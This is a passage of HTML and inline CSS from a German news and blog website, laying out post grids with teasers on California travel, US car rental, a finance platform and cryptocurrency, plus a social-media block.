  1186.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" class="td-image-wrap " title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-7-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  1187.                
  1188.                <div class="td-module-meta-info">
  1189.                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1190.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer">Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer</a></h3>
  1191.                    
  1192.                                            <div class="td-editor-date">
  1193.                                                        
  1194.                                                            <span class="td-author-date">
  1195.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T08:51:38+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/#respond">0</a></span>                                </span>
  1196.                                                    </div>
  1197.                    
  1198.                    <div class="td-excerpt">Kalifornien, der Sonnenstaat der USA, ist ein Mekka für...</div>
  1199.                    
  1200.                                    </div>
  1201.            </div>
  1202.        </div>
  1203.  
  1204.        </div></div></div></div></div></div><div id="tdi_106" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_107  wpb_row td-pb-row tdc-element-style" >
  1205. <style scoped>.tdi_107,.tdi_107 .tdc-columns{min-height:0}#tdi_106.tdc-row[class*='stretch_row']>.td-pb-row>.td-element-style,#tdi_106.tdc-row[class*='stretch_row']>.td-pb-row>.tdc-video-outer-wrapper{width:100%!important}.tdi_107,.tdi_107 .tdc-columns{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}.tdi_107 .tdc-columns{width:100%}@media (max-width:767px){.tdi_107,.tdi_107 .tdc-columns{flex-direction:column}}.tdi_107{margin-right:0px!important;margin-bottom:40px!important;margin-left:0px!important;padding-top:3px!important;position:relative}.tdi_107 .td_block_wrap{text-align:left}@media (max-width:767px){.tdi_107{margin-bottom:70px!important;padding-top:10px!important;padding-bottom:10px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_107{margin-bottom:30px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_107{margin-bottom:30px!important}}</style>
  1206. <div class="tdi_106_rand_style td-element-style" ><div class="td-element-style-before"><style>.tdi_106_rand_style>.td-element-style-before{content:''!important;width:100%!important;height:100%!important;position:absolute!important;top:0!important;left:0!important;display:block!important;z-index:0!important;border-color:#eaeaea!important;border-style:solid!important;border-width:1px 0px 1px 0px!important}</style></div></div><div class="vc_column tdi_109  wpb_column vc_column_container tdc-column td-pb-span3">
  1207. <style scoped>.tdi_109{vertical-align:baseline}.tdi_109>.wpb_wrapper,.tdi_109>.wpb_wrapper>.tdc-elements{display:block}.tdi_109>.wpb_wrapper>.tdc-elements{width:100%}.tdi_109>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_109>.wpb_wrapper{width:auto;height:auto}.tdi_109{width:25%!important}@media (max-width:767px){.tdi_109{width:100%!important}}</style><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_110 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_110" >
  1208. <style>.tdi_110{margin-left:-20px!important}@media (min-width:768px) and (max-width:1018px){.tdi_110{margin-left:0px!important}}@media (max-width:767px){.tdi_110{margin-left:0px!important;justify-content:center!important;text-align:center!important}}</style><div class="td-block-row"><div class="td-block-span12 tdm-col">
  1209. <style>body .tdi_111 .tdm-title{color:#000000}.tdi_111 .tdm-title{font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important;font-weight:600!important;text-transform:uppercase!important}@media (min-width:768px) and (max-width:1018px){.tdi_111 .tdm-title{font-size:12px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_111 "><h3 class="tdm-title tdm-title-sm">Treten Sie bei oder Social Media</h3></div></div></div></div></div></div><div class="vc_column tdi_113  wpb_column vc_column_container tdc-column td-pb-span6">
  1210. <style scoped>.tdi_113{vertical-align:baseline}.tdi_113>.wpb_wrapper,.tdi_113>.wpb_wrapper>.tdc-elements{display:block}.tdi_113>.wpb_wrapper>.tdc-elements{width:100%}.tdi_113>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_113>.wpb_wrapper{width:auto;height:auto}.tdi_113{width:50%!important}@media (max-width:767px){.tdi_113{margin-bottom:8px!important;width:100%!important}}</style><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_114 tdm-content-horiz-center td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_114" >
  1211. <style>@media (max-width:767px){.tdi_114{width:100%!important}}</style><div class="td-block-row"><div class="td-block-span12 tdm-col">
  1212. <style>body .tdi_115 .tdm-title{color:#000000}.tdi_115 .tdm-title{font-family:PT Serif!important;font-size:20px!important;line-height:1.2!important;font-weight:700!important}@media (min-width:768px) and (max-width:1018px){.tdi_115 .tdm-title{font-size:18px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_115 "><h3 class="tdm-title tdm-title-sm">Für noch exklusivere Inhalte!</h3></div></div></div></div></div></div><div class="vc_column tdi_117  wpb_column vc_column_container tdc-column td-pb-span3">
  1213. <style scoped>.tdi_117{vertical-align:baseline}.tdi_117>.wpb_wrapper,.tdi_117>.wpb_wrapper>.tdc-elements{display:block}.tdi_117>.wpb_wrapper>.tdc-elements{width:100%}.tdi_117>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_117>.wpb_wrapper{width:auto;height:auto}.tdi_117{width:25%!important}@media (max-width:767px){.tdi_117{width:100%!important}}</style><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_socials tdi_118 tdm-content-horiz-right td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_118" >
  1214. <style>.tdi_118{margin-right:-20px!important}@media (min-width:768px) and (max-width:1018px){.tdi_118{margin-right:0px!important}}@media (max-width:767px){.tdi_118{margin-right:0px!important;justify-content:center!important;text-align:center!important}}</style>
  1215. <style>.tdm_block.tdm_block_socials{margin-bottom:0}.tdm-social-wrapper{*zoom:1}.tdm-social-wrapper:before,.tdm-social-wrapper:after{display:table;content:'';line-height:0}.tdm-social-wrapper:after{clear:both}.tdm-social-item-wrap{display:inline-block}.tdm-social-item{position:relative;display:inline-block;vertical-align:middle;-webkit-transition:all 0.2s;transition:all 0.2s;text-align:center;-webkit-transform:translateZ(0);transform:translateZ(0)}.tdm-social-item i{font-size:14px;color:var(--td_theme_color,#4db2ec);-webkit-transition:all 0.2s;transition:all 0.2s}.tdm-social-text{display:none;margin-top:-1px;vertical-align:middle;font-size:13px;color:var(--td_theme_color,#4db2ec);-webkit-transition:all 0.2s;transition:all 0.2s}.tdm-social-item-wrap:hover i,.tdm-social-item-wrap:hover .tdm-social-text{color:#000}.tdm-social-item-wrap:last-child .tdm-social-text{margin-right:0!important}</style>
  1216. <style>.tdi_119 .tdm-social-item i{font-size:14px;vertical-align:middle}.tdi_119 .tdm-social-item i.td-icon-linkedin,.tdi_119 .tdm-social-item i.td-icon-pinterest,.tdi_119 .tdm-social-item i.td-icon-blogger,.tdi_119 .tdm-social-item i.td-icon-vimeo{font-size:11.2px}.tdi_119 .tdm-social-item{width:28px;height:28px;margin:3px 6px 3px 0}.tdi_119 .tdm-social-item i{line-height:28px}.tdi_119 .tdm-social-item-wrap:last-child .tdm-social-item{margin-right:0!important}.tdi_119 .tdm-social-item i,.tds-team-member2 .tdi_119.tds-social1 .tdm-social-item i{color:#ec3535}.tdi_119 .tdm-social-item-wrap:hover i,.tds-team-member2 .tdi_119.tds-social1 .tdm-social-item:hover i{color:#000000}.tdi_119 .tdm-social-text{display:none;margin-left:2px;margin-right:18px}@media (min-width:768px) and (max-width:1018px){.tdi_119 .tdm-social-item i{font-size:12px;vertical-align:middle}.tdi_119 .tdm-social-item i.td-icon-linkedin,.tdi_119 .tdm-social-item i.td-icon-pinterest,.tdi_119 .tdm-social-item i.td-icon-blogger,.tdi_119 .tdm-social-item i.td-icon-vimeo{font-size:9.6px}.tdi_119 .tdm-social-item{width:24px;height:24px}.tdi_119 .tdm-social-item i{line-height:24px}}</style><div class="tdm-social-wrapper tds-social1 tdi_119"><div class="tdm-social-item-wrap"><a href="#"  title="Facebook" class="tdm-social-item"><i class="td-icon-font td-icon-facebook"></i><span style="display: none">Facebook</span></a></div><div class="tdm-social-item-wrap"><a href="#"  title="Instagram" class="tdm-social-item"><i class="td-icon-font td-icon-instagram"></i><span style="display: none">Instagram</span></a></div><div class="tdm-social-item-wrap"><a href="#"  title="Twitter" class="tdm-social-item"><i class="td-icon-font td-icon-twitter"></i><span style="display: none">Twitter</span></a></div></div></div></div></div></div></div><div id="tdi_120" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_121  wpb_row td-pb-row tdc-element-style" >
  1217. <style scoped>.tdi_121,.tdi_121 .tdc-columns{min-height:0}#tdi_120.tdc-row[class*='stretch_row']>.td-pb-row>.td-element-style,#tdi_120.tdc-row[class*='stretch_row']>.td-pb-row>.tdc-video-outer-wrapper{width:100%!important}.tdi_121,.tdi_121 .tdc-columns{display:block}.tdi_121 .tdc-columns{width:100%}.tdi_121{margin-right:0px!important;margin-bottom:60px!important;margin-left:0px!important;padding-top:24px!important;padding-bottom:24px!important;position:relative}.tdi_121 .td_block_wrap{text-align:left}@media (min-width:1019px) and (max-width:1140px){.tdi_121{margin-bottom:40px!important;padding-top:20px!important;padding-bottom:20px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_121{margin-bottom:40px!important;padding-top:15px!important;padding-bottom:15px!important}}@media (max-width:767px){.tdi_121{padding-top:15px!important;padding-bottom:15px!important}}</style>
  1218. <div class="tdi_120_rand_style td-element-style" ><style>.tdi_120_rand_style{background-color:#f7f7f7!important}</style></div><div class="vc_column tdi_123  wpb_column vc_column_container tdc-column td-pb-span12">
  1219. <style scoped>.tdi_123{vertical-align:baseline}.tdi_123>.wpb_wrapper,.tdi_123>.wpb_wrapper>.tdc-elements{display:block}.tdi_123>.wpb_wrapper>.tdc-elements{width:100%}.tdi_123>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_123>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper" ><div class="vc_row_inner tdi_125  vc_row vc_inner wpb_row td-pb-row absolute_inner_full" >
  1220. <style scoped>.tdi_125{position:absolute!important;top:0;z-index:1}.tdi_125,.tdi_125 .tdc-inner-columns{display:block}.tdi_125 .tdc-inner-columns{width:100%}.tdi_125{margin-top:-32px!important}.tdi_125 .td_block_wrap{text-align:left}@media (min-width:768px) and (max-width:1018px){.tdi_125{margin-top:-22px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_125{margin-top:-28px!important}}</style><div class="vc_column_inner tdi_127  wpb_column vc_column_container tdc-inner-column td-pb-span12">
  1221. <style scoped>.tdi_127{vertical-align:baseline}.tdi_127 .vc_column-inner>.wpb_wrapper,.tdi_127 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_127 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_128 tdm-inline-block td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_128" >
  1222. <style>.tdi_128{margin-left:20px!important;padding-top:8px!important;padding-right:16px!important;padding-bottom:10px!important;padding-left:14px!important;z-index:1!important;position:relative}@media (min-width:1019px) and (max-width:1140px){.tdi_128{padding-top:6px!important;padding-right:14px!important;padding-bottom:8px!important;padding-left:12px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_128{margin-left:15px!important;padding-top:4px!important;padding-right:12px!important;padding-bottom:6px!important;padding-left:10px!important}}</style>
  1223. <style>.tdm_block.tdm_block_inline_text{margin-bottom:0;vertical-align:top}.tdm_block.tdm_block_inline_text .tdm-descr{margin-bottom:0;-webkit-transform:translateZ(0);transform:translateZ(0)}.tdc-row-content-vert-center .tdm-inline-text-yes{vertical-align:middle}.tdc-row-content-vert-bottom .tdm-inline-text-yes{vertical-align:bottom}.tdi_128{text-align:left!important}.tdi_128 .tdm-descr{color:#ffffff;font-family:PT Serif!important;font-size:20px!important;font-style:italic!important;font-weight:700!important;letter-spacing:0.5px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_128 .tdm-descr{font-size:18px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_128 .tdm-descr{font-size:16px!important}}</style>
  1224. <div class="tdi_128_rand_style td-element-style"><style>
  1225. .tdi_128_rand_style{
  1226. background-color:#ec3535 !important;
  1227. }
  1228. </style></div><p class="tdm-descr">Brechen</p></div></div></div></div></div><div class="td-big-grid-flex td_block_wrap td_block_big_grid_flex_1 tdi_130 td-pb-border-top td_block_template_1 td-big-grid-flex-posts" data-td-block-uid="tdi_130" >
  1229. <style>.tdi_130{margin-bottom:22px!important;padding-bottom:22px!important;border-color:#dddddd!important;border-style:solid!important;border-width:0px 0px 1px 0px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_130{margin-bottom:18px!important;padding-bottom:18px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_130{margin-bottom:15px!important;padding-bottom:15px!important}}@media (max-width:767px){.tdi_130{padding-bottom:0px!important;border-width:0px 0px 0px 0px!important}}</style>
  1230. <style>.td-big-grid-flex{width:100%;padding-bottom:0}.td-big-grid-flex .td_block_inner:after,.td-big-grid-flex .td_block_inner .td-big-grid-flex-post:after{content:'';display:table;clear:both}.td-big-grid-flex .td-big-grid-flex-post{position:relative;float:left;padding-bottom:0}.td-big-grid-flex .td-image-container{position:relative;flex:0 0 100%;width:100%;height:100%}.td-big-grid-flex .td-image-wrap{position:relative;display:block;overflow:hidden}.td-big-grid-flex .td-image-wrap:before{position:absolute;bottom:0;left:0;width:100%;height:100%;-webkit-transition:background-color 0.3s ease;transition:background-color 0.3s ease;z-index:1}.td-big-grid-flex .td-module-thumb{position:relative;margin-bottom:0}.td-big-grid-flex .td-module-thumb:after{position:absolute;top:0;left:0;width:100%;height:100%}.td-big-grid-flex .td-thumb-css{width:100%;height:100%;position:absolute;background-size:cover;background-position:center center}.td-big-grid-flex .td-module-thumb .td-thumb-css{transition:opacity 0.3s,transform 0.3s;-webkit-transition:opacity 0.3s,transform 0.3s}.td-big-grid-flex .td-post-category{transition:background-color 0.2s ease;-webkit-transition:background-color 0.2s ease;padding:3px 7px;background-color:rgba(0,0,0,0.7);font-family:'Roboto',sans-serif;line-height:13px;font-weight:500;text-transform:uppercase;pointer-events:auto}.td-big-grid-flex .td-module-meta-info{position:absolute;left:0;margin-bottom:0;width:100%;pointer-events:none;z-index:1}.td-big-grid-flex .td-module-title a,.td-big-grid-flex .td-post-author-name span,.td-big-grid-flex .td-module-container:hover .entry-title a,.td-big-grid-flex .td-post-author-name a,.td-big-grid-flex .td-post-date{color:#fff}.td-big-grid-flex .td-module-title{margin:0}.td-big-grid-flex .td-module-title a{text-shadow:1px 1px 3px rgba(0,0,0,0.2)}.td-big-grid-flex .td-editor-date{display:inline-block}.td-big-grid-flex .td-post-author-name a,.td-big-grid-flex .td-post-author-name span,.td-big-grid-flex .td-post-date{text-shadow:1px 1px 1px rgba(0,0,0,0.3)}.td-big-grid-flex .td-big-grid-flex-post-empty .td-image-wrap{background-color:#e5e5e5}.td-big-grid-flex .td-big-grid-flex-post-empty .td-image-wrap:before{display:none}.td_block_big_grid_flex_1 .td-module-container{position:relative}.td_block_big_grid_flex_1 .td-image-wrap{padding-bottom:75%}.td_block_big_grid_flex_1 .td-module-meta-info{padding:22px 20px}.td_block_big_grid_flex_1 .td-module-title{font-family:'Roboto',sans-serif;font-size:27px;font-weight:500;line-height:34px;margin:0 0 9px 0}.td_block_big_grid_flex_1 .td-editor-date{display:inline-block}body .tdi_130 .entry-thumb{background-position:center 50%}body .tdi_130 .td-image-wrap{padding-bottom:120%}body .tdi_130 .td-video-play-ico{top:50%;left:50%;transform:translate(-50%,-50%)}body .tdi_130 .td-module-meta-info{bottom:0;padding:0 15px 15px 20px}.tdi_130 .td-module-exclusive .td-module-title a:before{display:inline-block}body .tdi_130 .td-post-category{margin:0 0 5px;padding:4px 8px;border-radius:2px;background-color:#ec3535;color:#ffffff;font-family:Work Sans!important;font-size:12px!important;line-height:1.2!important;font-weight:600!important;text-transform:uppercase!important}body .tdi_130 .td-post-category:not(.td-post-extra-category){display:inline-block}body .tdi_130 .td-module-title a{box-shadow:inset 0 0 0 0 #000;color:#ffffff;text-shadow:none}body .tdi_130 .td-editor-date{display:inline}body .tdi_130 .td-post-author-name{display:none}body .tdi_130 .td-post-date,body .tdi_130 .td-post-author-name span{display:none}body .tdi_130 .entry-review-stars{display:inline-block;color:#fff}body .tdi_130 .td-icon-star,body .tdi_130 .td-icon-star-empty,body .tdi_130 .td-icon-star-half{font-size:15px}body .tdi_130 .td-big-grid-flex-post:nth-child(4n+1){clear:both}body .tdi_130 .td-image-wrap:before{content:'';background:-webkit-linear-gradient(0deg,rgba(0,0,0,0.8),rgba(0,0,0,0) 41%,rgba(0,0,0,0));background:linear-gradient(0deg,rgba(0,0,0,0.8),rgba(0,0,0,0) 41%,rgba(0,0,0,0))}body .tdi_130 .td-module-container:hover .td-post-category{background-color:#ec3535;color:#ffffff}body .tdi_130 .td-big-grid-flex-post:hover .td-module-title a{color:#ffffff}body .tdi_130 .entry-title{margin:10px 0 0 0;font-family:Work Sans!important;font-size:22px!important;line-height:1.1!important;font-weight:700!important}html:not([class*='ie']) body .tdi_130 .td-module-container:hover .entry-thumb:before{opacity:0}@media (max-width:767px){.td-big-grid-flex .td_block_inner{margin-left:-20px;margin-right:-20px}}@media (min-width:767px){.td-big-grid-flex-lightsky .td-image-wrap:after{content:'';position:absolute;top:0;left:0;width:160%;height:100%;background:rgba(255,255,255,0.2);transform:scale3d(1.9,1.4,1) rotate3d(0,0,1,45deg) translate3d(0,-120%,0);-webkit-transform:scale3d(1.9,1.4,1) rotate3d(0,0,1,45deg) translate3d(0,-120%,0);transition:transform 0.7s ease 0s;-webkit-transition:transform 0.7s ease 0s;z-index:1}.td-big-grid-flex-lightsky .td-module-container:hover .td-image-wrap:after{transform:scale3d(1.9,1.4,1) rotate3d(0,0,1,45deg) translate3d(0,146%,0);-webkit-transform:scale3d(1.9,1.4,1) rotate3d(0,0,1,45deg) translate3d(0,146%,0)}}@media (max-width:767px){div.td-big-grid-flex-scroll .td-big-grid-flex-post{float:none}div.td-big-grid-flex-scroll .td-big-grid-flex-scroll-holder{overflow-x:auto;overflow-y:hidden;white-space:nowrap;font-size:0;-webkit-overflow-scrolling:touch}div.td-big-grid-flex-scroll .td-big-grid-flex-scroll-holder .td-big-grid-flex-post{display:inline-block;vertical-align:top}div.td-big-grid-flex-scroll .td-module-title a{white-space:normal}}@media (max-width:767px){.td_block_big_grid_flex_1 .td-big-grid-flex-post{width:100%}}@media (min-width:767px){body .tdi_130 .td-module-container:hover .td-thumb-css{transform:scale3d(1.1,1.1,1);-webkit-transform:scale3d(1.1,1.1,1)}}@media (min-width:767px){body .tdi_130 .td-big-grid-flex-post{width:25%}}@media (min-width:767px){body .tdi_130 .td-big-grid-flex-post{padding-left:10px;padding-right:10px}body .tdi_130 .td_block_inner{margin-left:-10px;margin-right:-10px}}@media (max-width:767px){body .tdi_130 .td-big-grid-flex-post{margin-bottom:20px}body .tdi_130 .td-big-grid-flex-post:last-child{margin-bottom:0}}@media (min-width:768px){body .tdi_130 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:767px){body .tdi_130 .td-big-grid-flex-post:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}body .tdi_130 .td-big-grid-flex-post .td-module-container:before{display:block!important}body .tdi_130 .td-big-grid-flex-post:nth-last-child(-n+4) .td-module-container:before{display:none!important}}@media (min-width:1019px) and (max-width:1140px){body .tdi_130 .td-module-meta-info{padding:0 10px 10px 12px}body .tdi_130 .td-post-category{padding:3px 6px}body .tdi_130 .td-module-title a{box-shadow:inset 0 0 0 0 #000}body .tdi_130 .td-big-grid-flex-post{clear:none!important}body .tdi_130 .td-big-grid-flex-post:nth-child(4n+1){clear:both!important}body .tdi_130 .entry-title{margin:6px 0 0 0;font-size:16px!important}@media (min-width:767px){body .tdi_130 .td-big-grid-flex-post{padding-left:5px;padding-right:5px}body .tdi_130 .td_block_inner{margin-left:-5px;margin-right:-5px}}@media (max-width:767px){body .tdi_130 .td-big-grid-flex-post{margin-bottom:10px}body .tdi_130 .td-big-grid-flex-post:last-child{margin-bottom:0}}@media (min-width:768px){body .tdi_130 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){body .tdi_130 .td-module-meta-info{padding:0 8px 8px 10px}body .tdi_130 .td-module-title a{box-shadow:inset 0 0 0 0 #000}body .tdi_130 .td-big-grid-flex-post{clear:none!important}body .tdi_130 .td-big-grid-flex-post:nth-child(4n+1){clear:both!important}body .tdi_130 .entry-title{margin:4px 0 0 0;font-size:14px!important}body .tdi_130 .td-post-category{font-size:11px!important}@media (min-width:767px){body .tdi_130 .td-big-grid-flex-post{padding-left:2.5px;padding-right:2.5px}body .tdi_130 .td_block_inner{margin-left:-2.5px;margin-right:-2.5px}}@media (max-width:767px){body .tdi_130 .td-big-grid-flex-post{margin-bottom:5px}body .tdi_130 .td-big-grid-flex-post:last-child{margin-bottom:0}}@media (min-width:768px){body .tdi_130 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){body .tdi_130 .td-module-title a{box-shadow:inset 0 0 0 0 #000}body .tdi_130 .td-big-grid-flex-post{clear:none!important}body .tdi_130 .td-big-grid-flex-post:nth-child(4n+1){clear:both!important}body .tdi_130 .entry-title{font-size:24px!important}@media (min-width:768px){body .tdi_130 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><div id=tdi_130 class="td_block_inner">
  1231.        <div class="td_module_flex_6 td-animation-stack td-big-grid-flex-post td-big-grid-flex-post-0 td-cpt-post">
  1232.            <div class="td-module-container td-category-pos-above">
  1233.                <div class="td-image-container">
  1234.                    <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" class="td-image-wrap " title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Finanzeno.net-Schafft-Erstklassige-Online-Finanzplattformen-696x392.jpg"  ></span></a></div>                </div>
  1235.  
  1236.                <div class="td-module-meta-info">
  1237.                                        <a href="https://nachrichtenmorgen.de/category/finanzen-und-vertrag/" class="td-post-category">Finanzen und Vertrag</a>
  1238.                    <div class="tdb-module-title-wrap">
  1239.                        <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen">Finanzeno.net Schafft Erstklassige Online-Finanzplattformen</a></h3>                    </div>
  1240.  
  1241.                                        
  1242.                                    </div>
  1243.            </div>
  1244.        </div>
  1245.  
  1246.        
  1247.        <div class="td_module_flex_6 td-animation-stack td-big-grid-flex-post td-big-grid-flex-post-1 td-cpt-post">
  1248.            <div class="td-module-container td-category-pos-above">
  1249.                <div class="td-image-container">
  1250.                    <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" class="td-image-wrap " title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt."><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Die-letzten-Jahre-waren-fuer-Krypto-Investoren-und-Krypto-Boersenbesitzer-ein-wilder-Ritt.jpg"  ></span></a></div>                </div>
  1251.  
  1252.                <div class="td-module-meta-info">
  1253.                                        <a href="https://nachrichtenmorgen.de/category/krypto/" class="td-post-category">Krypto</a>
  1254.                    <div class="tdb-module-title-wrap">
  1255.                        <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.">Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.</a></h3>                    </div>
  1256.  
  1257.                                        
  1258.                                    </div>
  1259.            </div>
  1260.        </div>
  1261.  
  1262.        
  1263.        <div class="td_module_flex_6 td-animation-stack td-big-grid-flex-post td-big-grid-flex-post-2 td-cpt-post">
  1264.            <div class="td-module-container td-category-pos-above">
  1265.                <div class="td-image-container">
  1266.                    <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" class="td-image-wrap " title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-10-696x391.jpg"  ></span></a></div>                </div>
  1267.  
  1268.                <div class="td-module-meta-info">
  1269.                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1270.                    <div class="tdb-module-title-wrap">
  1271.                        <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste">Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste</a></h3>                    </div>
  1272.  
  1273.                                        
  1274.                                    </div>
  1275.            </div>
  1276.        </div>
  1277.  
  1278.        
  1279.        <div class="td_module_flex_6 td-animation-stack td-big-grid-flex-post td-big-grid-flex-post-3 td-cpt-post">
  1280.            <div class="td-module-container td-category-pos-above">
  1281.                <div class="td-image-container">
  1282.                    <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" class="td-image-wrap " title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-1-1-696x391.jpg"  ></span></a></div>                </div>
  1283.  
  1284.                <div class="td-module-meta-info">
  1285.                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1286.                    <div class="tdb-module-title-wrap">
  1287.                        <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung">Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung</a></h3>                    </div>
  1288.  
  1289.                                        
  1290.                                    </div>
  1291.            </div>
  1292.        </div>
  1293.  
  1294.        </div></div><div class="td_block_wrap td_flex_block_1 tdi_131 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_131" >
  1295. <style>.tdi_131{margin-bottom:0px!important}@media (max-width:767px){.tdi_131{margin-bottom:0px!important;padding-right:15px!important;padding-left:15px!important}}</style>
  1296. <style>.tdi_131 .td-image-wrap{padding-bottom:100%}.tdi_131 .entry-thumb{background-position:center 50%}.tdi_131 .td-image-container{flex:0 0 30%;width:30%;display:block;order:1;margin-left:0;margin-right:auto}.ie10 .tdi_131 .td-image-container,.ie11 .tdi_131 .td-image-container{flex:0 0 auto}.tdi_131 .td-module-container{flex-direction:row;border-color:#eaeaea!important}.tdi_131 .td-module-meta-info{flex:1;padding:0 16px 0 0;display:flex;flex-direction:column;justify-content:center;border-color:#eaeaea}body .tdi_131 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_131 .td-category-pos-above .td-post-category{align-self:flex-start;align-self:flex-start!important}.tdi_131 .td_module_wrap{width:25%;float:left;padding-left:10px;padding-right:10px;padding-bottom:10px;margin-bottom:10px}.rtl .tdi_131 .td_module_wrap{float:right}.tdi_131 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_131 .td-module-container:before{bottom:-10px;border-color:#eaeaea}.tdi_131 .td-post-vid-time{display:block}.tdi_131 .td-post-category{margin:0 5px 0 0;padding:2px 0;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_131 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_131 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_131 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_131 .td-read-more{display:none}.tdi_131 .td-author-date{display:inline}.tdi_131 .td-post-author-name{display:none}.tdi_131 .td-post-date,.tdi_131 .td-post-author-name span{display:none}.tdi_131 .entry-review-stars{display:inline-block}.tdi_131 .td-icon-star,.tdi_131 .td-icon-star-empty,.tdi_131 .td-icon-star-half{font-size:15px}.tdi_131 .td-module-comments{display:none}.tdi_131 